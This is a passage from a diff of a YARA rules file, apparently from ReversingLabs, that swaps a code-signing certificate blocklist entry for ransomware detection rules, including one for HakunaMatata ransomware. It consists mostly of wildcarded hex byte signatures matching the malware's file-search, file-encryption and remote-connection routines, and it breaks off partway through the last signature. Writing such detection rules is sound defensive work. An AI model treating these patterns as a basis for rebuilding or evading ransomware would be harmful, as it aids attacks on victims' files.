+            ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ??
+            3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46
+            ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ??
+            ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B
+            45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8
+            ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B
+            CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ??
+            8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ??
+            ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ??
+            75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ??
+            3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45
+            ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
+            ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B
+            C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41
+            89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45
+            ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52
+            50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81
+            7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50
+            FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6
+            53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85
+            DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53
+            FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ??
+            ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75
+            ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83
+            C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50
+            57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ??
+            ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3-T TOV" and pe.signatures [ i ] . serial == "43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HakunaMatata ransomware."
 		author = "ReversingLabs"
-		id = "b079b564-9284-59b6-9703-4e33f2b2c44d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "17438fcd-7a51-5fb6-96ac-38523bc1744f"
+		date = "2020-11-11"
+		modified = "2020-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1744-L1760"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f"
+		logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HakunaMatata"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ??
+            ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
+            EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B
+            45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ??
+            01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ??
+            39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ??
+            89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
+            83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89
+            54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB
+            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B
+            45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89
+            F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0
+            79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ??
+            8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0
+            83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ??
+            8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ??
+            ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89
+            45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
+            EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$encrypt_files_2 = {
+            55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF
+            D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89
+            44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ??
+            8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0
+            74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ??
+            ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ??
+            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89
+            45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89
+            44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
+            FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89
+            C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89
+            4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94
+            C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ??
+            89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45
+            ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ??
+            ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ??
+            8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45
+            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ??
+            ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89
+            45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83
+            F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ??
+            ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B
+            45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B
+            55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ??
+            ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B
+            45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B
+            45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
+            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
+            FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2
+        }
+		$search_files = {
+            E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ??
+            83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ??
+            ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC
+            ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89
+            C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85
+            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95
+            C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ??
+            ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7
+            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ??
+            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0
+            74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1
+            E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+        }
+		$search_files_2 = {
+            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
+            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
+            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
+            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8
+        }
+		$remote_connection = {
+            55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
